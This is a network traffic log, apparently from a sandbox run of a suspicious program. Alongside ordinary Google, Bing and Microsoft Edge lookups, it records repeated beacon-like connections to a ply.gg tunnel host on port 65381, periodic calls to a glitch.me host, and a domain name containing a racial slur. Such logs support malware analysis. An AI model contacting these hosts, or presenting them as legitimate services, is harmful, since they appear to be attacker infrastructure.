US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 95.100.153.147:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 13.107.21.239:443 edge.microsoft.com tcp
US 204.79.197.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 95.100.153.167:443 www.bing.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 104.21.66.212:443 niggafart.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 204.79.197.239:443 edge.microsoft.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 niggafart.com udp
US 8.8.8.8:53 niggafart.com udp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 95.100.153.192:443 www.bing.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50151 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 13.107.6.158:80 edge-http.microsoft.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
N/A 127.0.0.1:50188 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50220 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50243 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50264 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50280 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50298 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 95.100.153.192:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 204.79.197.239:443 edge.microsoft.com tcp
US 13.107.21.239:443 edge.microsoft.com tcp
N/A 127.0.0.1:50310 tcp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50328 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50340 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 95.100.153.143:443 www.bing.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50365 tcp
N/A 127.0.0.1:50368 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50388 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50400 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50416 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50441 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50449 tcp
N/A 127.0.0.1:50465 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
